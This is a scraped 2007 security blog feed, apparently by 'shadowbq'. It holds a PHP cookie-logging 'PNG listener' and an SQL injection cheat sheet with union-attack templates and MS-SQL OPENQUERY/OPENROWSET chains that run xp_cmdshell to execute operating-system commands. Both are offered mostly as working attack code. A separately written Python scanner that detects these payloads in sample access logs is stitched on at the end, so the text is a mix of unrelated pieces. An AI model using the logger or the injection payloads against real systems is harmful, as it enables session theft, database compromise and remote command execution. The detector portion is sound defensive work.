or terminate...shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-15122506786060477352007-03-07T20:52:00.000+00:002007-03-07T21:16:23.795+00:00PNG Listener w/loggerThis is an example of a simple PNG listener with a logging mechanism.<br />(Do I really have to explain how to use this?)<br /><br /><div id="code"><?php<br />$cookie = $_GET["c"];<br />if ($cookie == "init")<br />{<br />$file = fopen('001.txt', 'w');<br />fwrite($file, ":: 00* Logger:: \n");<br />}<br />else<br />{<br />$file = fopen('001.txt', 'a');<br />fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie."\n");<br />}<br />fclose($file);<br />header("Content-type: image/png");<br />$im = imageCreate(1,1);<br />$background = imageColorAllocate($im, 255, 255, 255); // white 1x1 pixel<br />imagePNG($im);<br />imageDestroy($im);<br />?></div><br /><br />I developed this snippet while working on a solution for browser history leaks.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-53861632581172775932007-03-07T16:20:00.000+00:002007-03-07T17:04:34.810+00:00SQL injection and identification<span style="font-weight:bold;">Identify the SQL server through blind SQL injection </span><br /><br />http://example.com/index.php?some_var=1/*!40017%20s*/ <br /><br />MySQL is at least 4.0.17 if you get a different result.<br /><br />## String based (concat ||) ==> PostgreSQL, Oracle<br />## String based (concat +) ==> MS-SQL, MS-Access<br /><br /><span style="font-weight:bold;">Normal union attack</span><br /><div id="code">$var$quote_type AND 1=1;--<br />$var$quote_type AND 1=0;--<br />$var$quote_type union all select $select_statement where 1=0;--<br />$var$quote_type AND 1=0 union all select $select_statement;--<br />$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--</div><br /><br /><span style="font-weight:bold;">MS-SQL</span><br /><br />Check if we are sysadmin (the hex literal is 'sysadmin')<br /><div id="code">IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))</div><br /><br />Check things like<br />MSSQL_OPENQUERY<br /><div id="code">(select 1 from OPENQUERY([$servername],'select 1'))</div><br /><br />MSSQL_OPENROWSET<br /><div id="code">(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))</div><br />or<br /><div id="code">(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))</div><br /><br />If we have a linked server and sa<br /><div id="code">select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')<br />select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')<br />select count(*) from TMP_TMP<br />select 1 where 1=(select cmd from TMP_TMP where id=7)<br />select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')</div><br />If already sa<br /><div id="code">select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')<br />select * from OPENROWSET('SQLOLEDB','';;,'select @@version')</div> <br />Other things to do<br /><div id="code">select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')<br />select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')<br />select * from master..TMP_TMP<br />select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0
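The detection side of the probes this post lists, as an added example that is not the post's own code: a small Python scanner that URL-decodes each request in an access log and tags the MySQL version-comment, tautology, UNION and OPENQUERY/OPENROWSET/xp_cmdshell patterns. The signature names, the log format and the log lines are this example's own constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request-level signatures for the probes the post lists: the MySQL
# version-conditional comment (/*!40017 ... */), "AND 1=1 / AND 1=0"
# tautology pairs, UNION ALL SELECT, and the MS-SQL OPENQUERY/OPENROWSET,
# IS_SRVROLEMEMBER and xp_cmdshell calls.  Names are this example's own.
SIGNATURES = [
    ("mysql_version_comment", re.compile(r"/\*!\d{5}", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("tautology", re.compile(r"\b(?:and|or)\s+1\s*=\s*[01]\b", re.I)),
    ("mssql_openquery", re.compile(r"\bopen(?:query|rowset)\s*\(", re.I)),
    ("mssql_role_check", re.compile(r"\bis_srvrolemember\s*\(", re.I)),
    ("mssql_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("sql_comment_terminator", re.compile(r";\s*--")),
]

# Apache/nginx "combined"-style access log line (constructed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_request(path):
    """Return the signature names that match one request path + query."""
    decoded = unquote_plus(path)
    decoded = unquote_plus(decoded)  # second pass catches double-encoded payloads
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines):
    """Parse access-log lines and return one hit per request that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        tags = scan_request(m.group("path"))
        if tags:
            hits.append({"ip": m.group("ip"), "status": m.group("status"),
                         "path": m.group("path"), "tags": tags})
    return hits


# Constructed sample traffic: one benign request followed by the post's
# MySQL version probe, a union attack, and an OPENROWSET attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Mar/2007:16:20:01 +0000] "GET /index.php?some_var=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Mar/2007:16:20:02 +0000] "GET /index.php?some_var=1/*!40017%20s*/ HTTP/1.1" 200 498',
    '10.0.0.9 - - [07/Mar/2007:16:20:03 +0000] "GET /index.php?some_var=1%27%20AND%201=0%20union%20all%20select%201,2,3;-- HTTP/1.1" 500 220',
    '10.0.0.9 - - [07/Mar/2007:16:20:04 +0000] "GET /index.php?some_var=1%27;select%20*%20from%20OPENROWSET(%27SQLOLEDB%27,%27%27;%27sa%27;%27x%27,%27select%201%27)-- HTTP/1.1" 500 220',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ",".join(hit["tags"]), hit["path"])
```

A 500 status paired with a tagged request, as in the last two sample lines, is the combination worth alerting on first, since it suggests the injected syntax reached the database.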